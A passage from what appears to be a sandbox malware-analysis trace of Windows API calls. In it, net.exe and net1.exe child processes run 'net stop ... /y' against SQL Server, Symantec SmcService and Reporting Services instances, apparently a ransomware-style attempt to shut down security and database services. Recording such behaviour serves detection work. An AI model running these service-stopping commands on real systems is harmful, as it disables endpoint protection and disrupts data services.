_String2="MSSQLFDLAUNCHER$TPS") returned 6 [0046.169] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$TPS") returned -1 [0046.169] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$TPS") returned -12 [0046.169] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$TPS") returned 1 [0046.169] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$TPS", opcode=0x0, arg=0x0, bufptr=0x24f72c | out: bufptr=0x24f72c) returned 0x889 [0046.170] wcscpy_s (in: _Destination=0xc6a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0046.170] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0046.171] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc6b338, nSize=0x800, Arguments=0xc69dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0046.172] GetFileType (hFile=0x26c) returned 0x3 [0046.172] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2c4020 [0046.172] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2c4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n+", lpUsedDefaultChar=0x0) returned 30 [0046.172] WriteFile (in: hFile=0x26c, lpBuffer=0x2c4020*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x24f66c, lpOverlapped=0x0 | out: lpBuffer=0x2c4020*, lpNumberOfBytesWritten=0x24f66c*=0x1e, lpOverlapped=0x0) returned 1 [0046.172] LocalFree (hMem=0x2c4020) returned 0x0 [0046.172] GetFileType (hFile=0x26c) returned 0x3 [0046.172] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c62c8 [0046.172] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0046.172] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62c8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24f66c, lpOverlapped=0x0 | out: lpBuffer=0x2c62c8*, lpNumberOfBytesWritten=0x24f66c*=0x2, lpOverlapped=0x0) returned 1 [0046.172] LocalFree (hMem=0x2c62c8) returned 0x0 [0046.172] _ultow (in: _Dest=0x889, _Radix=2422428 | out: _Dest=0x889) returned="2185" [0046.172] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc6b338, nSize=0x800, Arguments=0xc69dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0046.172] GetFileType (hFile=0x26c) returned 0x3 [0046.173] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2c62c8 [0046.173] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2c62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0046.173] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62c8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x24f678, lpOverlapped=0x0 | out: lpBuffer=0x2c62c8*, lpNumberOfBytesWritten=0x24f678*=0x34, lpOverlapped=0x0) returned 1 [0046.173] LocalFree (hMem=0x2c62c8) returned 0x0 [0046.173] GetFileType (hFile=0x26c) returned 0x3 [0046.173] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c62c8 [0046.173] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0046.173] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62c8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24f678, lpOverlapped=0x0 | out: lpBuffer=0x2c62c8*, lpNumberOfBytesWritten=0x24f678*=0x2, lpOverlapped=0x0) returned 1 [0046.173] LocalFree (hMem=0x2c62c8) returned 0x0 [0046.173] NetApiBufferFree (Buffer=0x2c1c80) returned 0x0 [0046.173] NetApiBufferFree (Buffer=0x2c1c98) returned 0x0 [0046.173] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPS /y" [0046.173] exit (_Code=2) Process: id = "89" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x45cb4000" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SmcService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 157 os_tid = 0x33c Process: id = "90" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x46c80000" os_pid = "0x330" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "89" os_parent_pid = "0x128" cmd_line = "C:\\Windows\\system32\\net1 stop SmcService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 158 os_tid = 0x914 [0046.449] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f82c | out: lpSystemTimeAsFileTime=0x26f82c*(dwLowDateTime=0xe5e3fd60, dwHighDateTime=0x1d57a86)) [0046.449] GetCurrentProcessId () returned 0x330 [0046.449] GetCurrentThreadId () returned 0x914 [0046.449] GetTickCount () returned 0x114692f [0046.449] QueryPerformanceCounter (in: lpPerformanceCount=0x26f824 | out: lpPerformanceCount=0x26f824*=16673349214) returned 1 [0046.449] GetModuleHandleA (lpModuleName=0x0) returned 0x510000 [0046.449] __set_app_type (_Type=0x1) [0046.449] __p__fmode () returned 0x74eb31f4 [0046.449] __p__commode () returned 0x74eb31fc [0046.449] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x51ffe6) returned 0x0 [0046.449] __getmainargs (in: _Argc=0x529064, _Argv=0x52906c, _Env=0x529068, _DoWildCard=0, _StartInfo=0x529024 | out: _Argc=0x529064, _Argv=0x52906c, _Env=0x529068) returned 0 [0046.450] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.450] GetConsoleOutputCP () returned 0x1b5 [0046.450] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x529080 | out: lpCPInfo=0x529080) returned 1 [0046.450] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.453] sprintf_s (in: _DstBuf=0x26f7e4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0046.453] setlocale (category=0, locale=".437") returned="English_United States.437" [0046.455] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0046.455] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0046.455] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SmcService /y" [0046.455] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f5b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0046.455] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x68) returned 0x3e3c10 [0046.455] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0046.455] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26f7b4 | out: Buffer=0x26f7b4*=0x3e1c70) returned 0x0 [0046.455] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26f7b4 | out: Buffer=0x26f7b4*=0x3e1c88) returned 0x0 [0046.455] _fileno (_File=0x74eb2900) returned -2 [0046.455] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0046.455] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0046.455] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0046.455] _wcsicmp (_String1="config", _String2="stop") returned -16 [0046.455] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0046.455] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0046.455] _wcsicmp (_String1="file", _String2="stop") returned -13 [0046.455] _wcsicmp (_String1="files", _String2="stop") returned -13 [0046.455] _wcsicmp (_String1="group", _String2="stop") returned -12 [0046.455] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0046.456] _wcsicmp (_String1="help", _String2="stop") returned -11 [0046.456] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0046.456] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0046.456] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0046.456] _wcsicmp (_String1="session", _String2="stop") returned -15 [0046.456] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0046.456] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0046.456] _wcsicmp (_String1="share", _String2="stop") returned -12 [0046.456] _wcsicmp (_String1="start", _String2="stop") returned -14 [0046.456] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0046.456] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0046.456] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0046.456] _wcsicmp (_String1="accounts", _String2="SmcService") returned -18 [0046.456] _wcsicmp (_String1="computer", _String2="SmcService") returned -16 [0046.456] _wcsicmp (_String1="config", _String2="SmcService") returned -16 [0046.456] _wcsicmp (_String1="continue", _String2="SmcService") returned -16 [0046.456] _wcsicmp (_String1="cont", _String2="SmcService") returned -16 [0046.456] _wcsicmp (_String1="file", _String2="SmcService") returned -13 [0046.456] _wcsicmp (_String1="files", _String2="SmcService") returned -13 [0046.456] _wcsicmp (_String1="group", _String2="SmcService") returned -12 [0046.456] _wcsicmp (_String1="groups", _String2="SmcService") returned -12 [0046.456] _wcsicmp (_String1="help", _String2="SmcService") returned -11 [0046.456] _wcsicmp (_String1="helpmsg", _String2="SmcService") returned -11 [0046.456] _wcsicmp (_String1="localgroup", _String2="SmcService") returned -7 [0046.456] _wcsicmp (_String1="pause", _String2="SmcService") returned -3 [0046.456] _wcsicmp (_String1="session", _String2="SmcService") returned -8 [0046.456] _wcsicmp (_String1="sessions", _String2="SmcService") returned -8 [0046.456] _wcsicmp (_String1="sess", _String2="SmcService") returned -8 [0046.456] _wcsicmp (_String1="share", _String2="SmcService") returned -5 [0046.456] _wcsicmp (_String1="start", _String2="SmcService") returned 7 [0046.456] _wcsicmp (_String1="stats", _String2="SmcService") returned 7 [0046.456] _wcsicmp (_String1="statistics", _String2="SmcService") returned 7 [0046.456] _wcsicmp (_String1="stop", _String2="SmcService") returned 7 [0046.456] _wcsicmp (_String1="time", _String2="SmcService") returned 1 [0046.456] _wcsicmp (_String1="user", _String2="SmcService") returned 2 [0046.456] _wcsicmp (_String1="users", _String2="SmcService") returned 2 [0046.456] _wcsicmp (_String1="msg", _String2="SmcService") returned -6 [0046.456] _wcsicmp (_String1="messenger", _String2="SmcService") returned -6 [0046.457] _wcsicmp (_String1="receiver", _String2="SmcService") returned -1 [0046.457] _wcsicmp (_String1="rcv", _String2="SmcService") returned -1 [0046.457] _wcsicmp (_String1="netpopup", _String2="SmcService") returned -5 [0046.457] _wcsicmp (_String1="redirector", _String2="SmcService") returned -1 [0046.457] _wcsicmp (_String1="redir", _String2="SmcService") returned -1 [0046.457] _wcsicmp (_String1="rdr", _String2="SmcService") returned -1 [0046.457] _wcsicmp (_String1="workstation", _String2="SmcService") returned 4 [0046.457] _wcsicmp (_String1="work", _String2="SmcService") returned 4 [0046.457] _wcsicmp (_String1="wksta", _String2="SmcService") returned 4 [0046.457] _wcsicmp (_String1="prdr", _String2="SmcService") returned -3 [0046.457] _wcsicmp (_String1="devrdr", _String2="SmcService") returned -15 [0046.457] _wcsicmp (_String1="lanmanworkstation", _String2="SmcService") returned -7 [0046.457] _wcsicmp (_String1="server", _String2="SmcService") returned -8 [0046.457] _wcsicmp (_String1="svr", _String2="SmcService") returned 9 [0046.457] _wcsicmp (_String1="srv", _String2="SmcService") returned 5 [0046.457] _wcsicmp (_String1="lanmanserver", _String2="SmcService") returned -7 [0046.457] _wcsicmp (_String1="alerter", _String2="SmcService") returned -18 [0046.457] _wcsicmp (_String1="netlogon", _String2="SmcService") returned -5 [0046.457] _wcsupr (in: _String="SmcService" | out: _String="SMCSERVICE") returned="SMCSERVICE" [0046.457] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3e54c8 [0046.460] GetServiceKeyNameW (in: hSCManager=0x3e54c8, lpDisplayName="SMCSERVICE", lpServiceName=0x52aaf0, lpcchBuffer=0x26f750 | out: lpServiceName="", lpcchBuffer=0x26f750) returned 0 [0046.460] _wcsicmp (_String1="msg", _String2="SMCSERVICE") returned -6 [0046.460] _wcsicmp (_String1="messenger", _String2="SMCSERVICE") returned -6 [0046.460] _wcsicmp (_String1="receiver", _String2="SMCSERVICE") returned -1 [0046.460] _wcsicmp (_String1="rcv", _String2="SMCSERVICE") returned -1 [0046.460] _wcsicmp (_String1="redirector", _String2="SMCSERVICE") returned -1 [0046.460] _wcsicmp (_String1="redir", _String2="SMCSERVICE") returned -1 [0046.460] _wcsicmp (_String1="rdr", _String2="SMCSERVICE") returned -1 [0046.460] _wcsicmp (_String1="workstation", _String2="SMCSERVICE") returned 4 [0046.461] _wcsicmp (_String1="work", _String2="SMCSERVICE") returned 4 [0046.461] _wcsicmp (_String1="wksta", _String2="SMCSERVICE") returned 4 [0046.461] _wcsicmp (_String1="prdr", _String2="SMCSERVICE") returned -3 [0046.461] _wcsicmp (_String1="devrdr", _String2="SMCSERVICE") returned -15 [0046.461] _wcsicmp (_String1="lanmanworkstation", _String2="SMCSERVICE") returned -7 [0046.461] _wcsicmp (_String1="server", _String2="SMCSERVICE") returned -8 [0046.461] _wcsicmp (_String1="svr", _String2="SMCSERVICE") returned 9 [0046.461] _wcsicmp (_String1="srv", _String2="SMCSERVICE") returned 5 [0046.461] _wcsicmp (_String1="lanmanserver", _String2="SMCSERVICE") returned -7 [0046.461] _wcsicmp (_String1="alerter", _String2="SMCSERVICE") returned -18 [0046.461] _wcsicmp (_String1="netlogon", _String2="SMCSERVICE") returned -5 [0046.461] NetServiceControl (in: servername=0x0, service="SMCSERVICE", opcode=0x0, arg=0x0, bufptr=0x26f74c | out: bufptr=0x26f74c) returned 0x889 [0046.462] wcscpy_s (in: _Destination=0x52a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0046.462] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0046.462] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x52b338, nSize=0x800, Arguments=0x529dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0046.464] GetFileType (hFile=0x26c) returned 0x3 [0046.464] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3e3ff8 [0046.464] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3e3ff8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0046.464] WriteFile (in: hFile=0x26c, lpBuffer=0x3e3ff8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x26f68c, lpOverlapped=0x0 | out: lpBuffer=0x3e3ff8*, lpNumberOfBytesWritten=0x26f68c*=0x1e, lpOverlapped=0x0) returned 1 [0046.464] LocalFree (hMem=0x3e3ff8) returned 0x0 [0046.464] GetFileType (hFile=0x26c) returned 0x3 [0046.464] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e62a0 [0046.464] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0046.464] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f68c, lpOverlapped=0x0 | out: lpBuffer=0x3e62a0*, lpNumberOfBytesWritten=0x26f68c*=0x2, lpOverlapped=0x0) returned 1 [0046.464] LocalFree (hMem=0x3e62a0) returned 0x0 [0046.464] _ultow (in: _Dest=0x889, _Radix=2553532 | out: _Dest=0x889) returned="2185" [0046.464] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x52b338, nSize=0x800, Arguments=0x529dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0046.464] GetFileType (hFile=0x26c) returned 0x3 [0046.464] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3e62a0 [0046.464] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3e62a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0046.464] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x26f698, lpOverlapped=0x0 | out: lpBuffer=0x3e62a0*, lpNumberOfBytesWritten=0x26f698*=0x34, lpOverlapped=0x0) returned 1 [0046.464] LocalFree (hMem=0x3e62a0) returned 0x0 [0046.465] GetFileType (hFile=0x26c) returned 0x3 [0046.465] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e62a0 [0046.465] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0046.465] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f698, lpOverlapped=0x0 | out: lpBuffer=0x3e62a0*, lpNumberOfBytesWritten=0x26f698*=0x2, lpOverlapped=0x0) returned 1 [0046.465] LocalFree (hMem=0x3e62a0) returned 0x0 [0046.465] NetApiBufferFree (Buffer=0x3e1c70) returned 0x0 [0046.465] NetApiBufferFree (Buffer=0x3e1c88) returned 0x0 [0046.465] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SmcService /y" [0046.465] exit (_Code=2) Process: id = "91" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x46fb9000" os_pid = "0x954" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ReportServer$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 159 os_tid = 0x92c Process: id = "92" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x47733000" os_pid = "0x930" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "91" os_parent_pid = "0x954" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 160 os_tid = 0x924 [0046.804] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efeb4 | out: lpSystemTimeAsFileTime=0x1efeb4*(dwLowDateTime=0xe61abd00, dwHighDateTime=0x1d57a86)) [0046.804] GetCurrentProcessId () returned 0x930 [0046.804] GetCurrentThreadId () returned 0x924 [0046.804] GetTickCount () returned 0x1146a96 [0046.804] QueryPerformanceCounter (in: lpPerformanceCount=0x1efeac | out: lpPerformanceCount=0x1efeac*=16708902096) returned 1 [0046.805] GetModuleHandleA (lpModuleName=0x0) returned 0xc0000 [0046.805] __set_app_type (_Type=0x1) [0046.805] __p__fmode () returned 0x74eb31f4 [0046.805] __p__commode () returned 0x74eb31fc [0046.805] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xcffe6) returned 0x0 [0046.805] __getmainargs (in: _Argc=0xd9064, _Argv=0xd906c, _Env=0xd9068, _DoWildCard=0, _StartInfo=0xd9024 | out: _Argc=0xd9064, _Argv=0xd906c, _Env=0xd9068) returned 0 [0046.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.805] GetConsoleOutputCP () returned 0x1b5 [0046.805] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd9080 | out: lpCPInfo=0xd9080) returned 1 [0046.805] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.808] sprintf_s (in: _DstBuf=0x1efe6c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0046.809] setlocale (category=0, locale=".437") returned="English_United States.437" [0046.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0046.810] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0046.810] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPSAMA /y" [0046.810] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1efc38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0046.811] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x7a) returned 0x583c20 [0046.811] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0046.811] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efe3c | out: Buffer=0x1efe3c*=0x581c80) returned 0x0 [0046.811] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efe3c | out: Buffer=0x1efe3c*=0x581c98) returned 0x0 [0046.811] _fileno (_File=0x74eb2900) returned -2 [0046.811] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0046.811] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0046.811] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0046.811] _wcsicmp (_String1="config", _String2="stop") returned -16 [0046.811] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0046.811] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0046.811] _wcsicmp (_String1="file", _String2="stop") returned -13 [0046.811] _wcsicmp (_String1="files", _String2="stop") returned -13 [0046.811] _wcsicmp (_String1="group", _String2="stop") returned -12 [0046.811] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0046.811] _wcsicmp (_String1="help", _String2="stop") returned -11 [0046.811] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0046.811] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0046.811] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0046.811] _wcsicmp (_String1="session", _String2="stop") returned -15 [0046.811] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0046.811] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0046.811] _wcsicmp (_String1="share", _String2="stop") returned -12 [0046.811] _wcsicmp (_String1="start", _String2="stop") returned -14 [0046.811] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0046.812] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0046.812] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0046.812] _wcsicmp (_String1="accounts", _String2="ReportServer$TPSAMA") returned -17 [0046.812] _wcsicmp (_String1="computer", _String2="ReportServer$TPSAMA") returned -15 [0046.812] _wcsicmp (_String1="config", _String2="ReportServer$TPSAMA") returned -15 [0046.812] _wcsicmp (_String1="continue", _String2="ReportServer$TPSAMA") returned -15 [0046.812] _wcsicmp (_String1="cont", _String2="ReportServer$TPSAMA") returned -15 [0046.812] _wcsicmp (_String1="file", _String2="ReportServer$TPSAMA") returned -12 [0046.812] _wcsicmp (_String1="files", _String2="ReportServer$TPSAMA") returned -12 [0046.812] _wcsicmp (_String1="group", _String2="ReportServer$TPSAMA") returned -11 [0046.812] _wcsicmp (_String1="groups", _String2="ReportServer$TPSAMA") returned -11 [0046.812] _wcsicmp (_String1="help", _String2="ReportServer$TPSAMA") returned -10 [0046.812] _wcsicmp (_String1="helpmsg", _String2="ReportServer$TPSAMA") returned -10 [0046.812] _wcsicmp (_String1="localgroup", _String2="ReportServer$TPSAMA") returned -6 [0046.812] _wcsicmp (_String1="pause", _String2="ReportServer$TPSAMA") returned -2 [0046.812] _wcsicmp (_String1="session", _String2="ReportServer$TPSAMA") returned 1 [0046.812] _wcsicmp (_String1="sessions", _String2="ReportServer$TPSAMA") returned 1 [0046.812] _wcsicmp (_String1="sess", _String2="ReportServer$TPSAMA") returned 1 [0046.812] _wcsicmp (_String1="share", _String2="ReportServer$TPSAMA") returned 1 [0046.812] _wcsicmp (_String1="start", _String2="ReportServer$TPSAMA") returned 1 [0046.812] _wcsicmp (_String1="stats", _String2="ReportServer$TPSAMA") returned 1 [0046.812] _wcsicmp (_String1="statistics", _String2="ReportServer$TPSAMA") returned 1 [0046.812] _wcsicmp (_String1="stop", _String2="ReportServer$TPSAMA") returned 1 [0046.812] _wcsicmp (_String1="time", _String2="ReportServer$TPSAMA") returned 2 [0046.812] _wcsicmp (_String1="user", _String2="ReportServer$TPSAMA") returned 3 [0046.812] _wcsicmp (_String1="users", _String2="ReportServer$TPSAMA") returned 3 [0046.812] _wcsicmp (_String1="msg", _String2="ReportServer$TPSAMA") returned -5 [0046.812] _wcsicmp (_String1="messenger", _String2="ReportServer$TPSAMA") returned -5 [0046.812] _wcsicmp (_String1="receiver", _String2="ReportServer$TPSAMA") returned -13 [0046.812] _wcsicmp (_String1="rcv", _String2="ReportServer$TPSAMA") returned -2 [0046.812] _wcsicmp (_String1="netpopup", _String2="ReportServer$TPSAMA") returned -4 [0046.812] _wcsicmp (_String1="redirector", _String2="ReportServer$TPSAMA") returned -12 [0046.812] _wcsicmp (_String1="redir", _String2="ReportServer$TPSAMA") returned -12 [0046.812] _wcsicmp (_String1="rdr", _String2="ReportServer$TPSAMA") returned -1 [0046.812] _wcsicmp (_String1="workstation", _String2="ReportServer$TPSAMA") returned 5 [0046.812] _wcsicmp (_String1="work", _String2="ReportServer$TPSAMA") returned 5 [0046.812] _wcsicmp (_String1="wksta", _String2="ReportServer$TPSAMA") returned 5 [0046.812] _wcsicmp (_String1="prdr", 